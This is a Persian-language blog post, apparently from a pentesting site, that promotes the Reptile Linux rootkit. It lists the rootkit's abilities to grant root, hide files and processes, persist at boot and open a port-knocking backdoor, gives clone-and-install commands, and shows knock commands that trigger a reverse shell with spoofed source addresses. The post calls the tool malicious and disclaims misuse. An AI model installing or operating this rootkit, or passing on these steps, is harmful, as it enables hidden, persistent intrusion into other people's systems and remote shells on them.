معرفی Rootkit لینوکسی Reptile !!! روت کیت چیست ؟
امروز قصد معرفی یک Rootkit لینوکسی پیشرفته رو برای شما عزیزان دارم !!!
این Rootkit برای اهداف شیطانی و سو استفاده نوشته شده است و روی کرنل های : 2.6x – 3.x – 4.x
پاسخگو است ، و تقریبا میشه گفت جز بهترین روت کیت های پابلیک شده موجود در سطح نت میباشد.

Rootkit چیست ؟

با سلام و احترام خدمت تمامی دوستان و اعضای محترم تیم امنیتی PentestCore.Com
در ابتدا بررسی کنیم Rootkit چیست ؟
همانطور که از اسمش پیداست ، نوعی بدافزار است که
با ورود به سیستم تارگت به بالاترین سطح دسترسی یعنی روت ارتقا پیدا میکند
و توانایی تغییر تمامی تنظیمات را داراست ، اغلب صاحب سیستم متوجه حضور آن نمیشود و یافتن آن بسیار سخت و تقریبا غیر ممکن است.

روت کیت لینوکسی Reptile دارای ویژگی های زیر است :

• Give root to unprivileged users
• Hide files and directories
• Hide files contents
• Hide processes
• Hide himself
• Hidden boot persistence
• Heaven’s door – A ICMP/UDP/TCP port-knocking backdoor
• Client to knock on heaven’s door 😀

نحوه نصب Rootkit :

• 1-apt-get install linux-headers-$(uname -r)
  2-git clone https://github.com/f0rb1dd3n/Reptile.git
  3-cd Reptile
• 4- install installer.sh/.

اطلاعات بصورت باینری داخل پوشه /reptile کپی میشوند که توسط روت کیت این پوشه مخفی شده است .
بدست آوردن اختیارات روت…

نحوه استفاده کردن از قابلیت Hide :

نحوه استفاده از قابلیت Knocking on heaven’s door :

switch (-x)  Protocol (ICMP/UDP/TCP)
switch (-s)  Source IP address (You can spoof)
switch (-t)  Target IP address
switch (-p)  Source Port
switch (-q)  Target Port
switch (-d)  Data to knock on backdoor: “<key> <reverse IP> <reverse Port>” -l Launch listener
switch (-l)  Launch listener

مثال :

ICMP: ./knock -x icmp -s 192.168.0.2 -t 192.168.0.3 -d “F0rb1dd3n 192.168.0.4 4444” -l

UDP: ./knock -x udp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 53 -d “F0rb1dd3n 192.168.0.4 4444” -l

TCP: ./knock -x tcp -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 80 -d “F0rb1dd3n 192.168.0.4 4444” -l

لینک گیت هاب ابزار :

Reptile Rootkit

امیدوارم که مفید بوده باشه
مسولیت استفاده نادرست به عهده کاربر میباشد…